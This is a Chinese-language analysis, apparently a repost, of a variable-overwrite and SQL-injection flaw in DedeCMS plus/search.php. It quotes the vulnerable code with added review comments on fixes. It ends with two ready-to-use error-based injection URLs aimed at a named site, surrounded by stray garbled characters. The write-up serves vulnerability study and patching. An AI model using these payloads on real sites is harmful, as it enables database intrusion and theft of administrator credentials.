微博上看到就分析了一下,这个漏洞不止一处地方可以被利用.其实可以无视 magic_quotes_gpc = On.真心不鸡肋.
作者: c4rp3nt3r@0x50sec.org
Dedecms最新版 plus/search.php 文件存在变量覆盖漏洞,成功利用该漏洞可以获取管理员密码.

黑哥说漏洞已补.怪我没有测试好.也没用这个黑站…不过这个漏洞真心不错,应该有一定利用价值.标题就不改了,补了就公开了吧.
============

Dedecms最新版 plus/search.php 文件存在变量覆盖漏洞,成功利用该漏洞可以获取管理员密码.

// Excerpt of plus/search.php as quoted in the article (extraction noise and
// HTML highlighting removed). It normalises the search parameters and, when no
// category id was supplied, tries to derive one from the keyword.
require_once(dirname(__FILE__)."/../include/common.inc.php");
require_once(DEDEINC."/arc.searchview.class.php");

// Each numeric parameter keeps its value only if it is set and is_numeric();
// otherwise it falls back to a default.
// NOTE(review): presumably these globals are populated from the request by
// common.inc.php (not shown) - confirm against that file.
$pagesize = (isset($pagesize) && is_numeric($pagesize)) ? $pagesize : 10;
// This is the only validation $typeid receives in this excerpt.
$typeid = (isset($typeid) && is_numeric($typeid)) ? $typeid : 0;
$channeltype = (isset($channeltype) && is_numeric($channeltype)) ? $channeltype : 0;
$kwtype = (isset($kwtype) && is_numeric($kwtype)) ? $kwtype : 1;
$mid = (isset($mid) && is_numeric($mid)) ? $mid : 0;

// $orderby and $searchtype are reduced to ASCII letters only.
if(!isset($orderby)) $orderby='';
else $orderby = preg_replace("#[^a-z]#i", '', $orderby);


if(!isset($searchtype)) $searchtype = 'titlekeyword';
else $searchtype = preg_replace("#[^a-z]#i", '', $searchtype);

// $keyword falls back to $q (or the empty string) when it is not set.
if(!isset($keyword)){
    if(!isset($q)) $q = '';
    $keyword=$q;
}

$oldkeyword = $keyword = FilterSearch(stripslashes($keyword));

// Look up category information.
// This branch runs only when $typeid is empty, i.e. when the numeric check
// above left it at 0.
if(empty($typeid))
{
    $typenameCacheFile = DEDEDATA.'/cache/typename.inc';
    // Rebuild the cache file when it is missing or older than 24 hours.
    if(!file_exists($typenameCacheFile) || filemtime($typenameCacheFile) < time()-(3600*24) )
    {
        $fp = fopen(DEDEDATA.'/cache/typename.inc', 'w');
        fwrite($fp, "<"."?php\r\n");
        $dsql->SetQuery("Select id,typename,channeltype From `#@__arctype`");
        $dsql->Execute();
        while($row = $dsql->GetArray())
        {
            // Writes one "$typeArr[id] = 'typename';" assignment per row.
            // NOTE(review): typename is written into PHP source without
            // escaping - confirm how it is validated when categories are saved.
            fwrite($fp, "\$typeArr[{$row['id']}] = '{$row['typename']}';\r\n");
        }
        fwrite($fp, '?'.'>');
        fclose($fp);
    }
    // Include the category cache and check whether the keyword matches a category name.
    require_once($typenameCacheFile);
    // Author's note: $typeArr is defined inside the generated cache file that is
    // included here; because of dedecms's global-variable mechanism, a $typeArr
    // can also be defined from outside.
    // NOTE(review): the cache file only assigns individual elements and never
    // resets the array, so entries that already exist in $typeArr before the
    // include are kept. Initialising $typeArr to an empty array immediately
    // before the require_once would close that gap.
    if(isset($typeArr) && is_array($typeArr))
    {
        foreach($typeArr as $id=>$typename)
        {

            // (highlighted in the article) Author's note: this step has to be
            // passed - the branch below runs only when $typename occurs in $keyword.
            $keywordn = str_replace($typename, ' ', $keyword);
            if($keyword != $keywordn)
            {
                $keyword = $keywordn;
                // (highlighted in the article) Author's note: variable overwrite -
                // this assignment makes the earlier
                // "$typeid = (isset($typeid) && is_numeric($typeid)) ? $typeid : 0;"
                // filter ineffective.
                // NOTE(review): $id is an array key of $typeArr and is not
                // re-validated here; casting it to an integer before assigning
                // would restore the guarantee the numeric check was meant to give.
                $typeid = $id;
                break;
            }
        }
    }
}
然后 plus/search.php 文件下面定义了一个 Search 类的对象.
在 arc.searchview.class.php 文件的 SearchView 类的构造函数声明了一个 TypeLink 类.
$this->TypeLink = new TypeLink($typeid);

TypeLink 类的构造函数没有经过过滤(程序员以为前面已经过滤过了…),直接带入了 sql 语句.
/**
 * Excerpt of the TypeLink class as quoted in the article (extraction noise and
 * HTML highlighting removed). The constructor copies site settings from
 * $GLOBALS, stores $typeid and builds a category lookup query from it.
 * The excerpt stops inside the constructor.
 */
class TypeLink
{
    var $typeDir;
    var $dsql;
    var $TypeID;
    var $baseDir;
    var $modDir;
    var $indexUrl;
    var $indexName;
    var $TypeInfos;
    var $SplitSymbol;
    var $valuePosition;
    var $valuePositionName;
    var $OptionArrayList;

    // Constructor
    // PHP 5 constructor
    function __construct($typeid)
    {
        $this->indexUrl = $GLOBALS['cfg_basehost'].$GLOBALS['cfg_indexurl'];
        $this->indexName = $GLOBALS['cfg_indexname'];
        $this->baseDir = $GLOBALS['cfg_basedir'];
        $this->modDir = $GLOBALS['cfg_templets_dir'];
        $this->SplitSymbol = $GLOBALS['cfg_list_symbol'];
        $this->dsql = $GLOBALS['dsql'];
        // Stored as received; no cast or validation happens in this constructor.
        $this->TypeID = $typeid;
        $this->valuePosition = '';
        $this->valuePositionName = '';
        $this->typeDir = '';
        $this->OptionArrayList = '';


        // Load category information.
        // (highlighted in the article) Author's note: the injection happens here;
        // it clearly needs magic_quotes_gpc = Off. Of limited use? Perhaps, but at
        // least it does not require the member centre.
        // NOTE(review): $typeid is interpolated into a quoted SQL literal with no
        // escaping or integer cast; an integer cast or a bound parameter is the fix.
        $query = "SELECT tp.*,ch.typename as
            ctypename,ch.addtable,ch.issystem FROM `#@__arctype` tp left join
            `#@__channeltype` ch
            on ch.id=tp.channeltype WHERE tp.id='$typeid' ";

        // Loose numeric comparison only; it does not validate that $typeid is an integer.
        if($typeid > 0)
        {
            $this->TypeInfos = $this->dsql->GetOne($query);
            // (the article's excerpt ends here)
利用代码一,需要 magic_quotes_gpc = Off
- O1 _' c! |1 iwww.political-security.com/plus/search.php?typeArr[2%27%20and%20@%60\%27%60%3D0and%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20%27]=c4&kwtype=0&q=c4rp3nt3r&searchtype=title. Z2 v, h- Q: N% j. h0 o
这只是其中一个利用代码… Search 类的构造函数再往下

// ... (omitted in the article) ...
// Fragment from further down the Search class constructor, as quoted in the article.
$this->TypeID = $typeid;
// ... (omitted in the article) ...
if($this->TypeID=="0"){
    $this->ChannelTypeid=1;
}else{
    // Author's note: the injection here is not stopped by magic_quotes_gpc = On,
    // so the issue is not a marginal one after all.
    // NOTE(review): TypeID is interpolated into the query without surrounding
    // quotes, so quote escaping offers no protection in this position; cast the
    // value to an integer or bind it as a parameter.
    $row =$this->dsql->GetOne("SELECT channeltype FROM `#@__arctype` WHERE id={$this->TypeID}");
    $this->ChannelTypeid=$row['channeltype'];

}
利用代码二,下面这个EXP 即使magic_quotes_gpc = On 也可以成功利用.
. B- j# Z. d# S u, G0 F / f) `/ {/ h- q( ^: T1 C3 d) K
www.political-security.com /plus/search.php?typeArr[1%20or%20@%60%27%60%3D1%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20@%60%27%60%3D0]=11&&kwtype=0&q=1111&searchtype=title

如果那个数据库里存在内容,就要考虑得复杂点了.我也没考虑那么周全,分析了下然后简单测试了下,也没用来黑站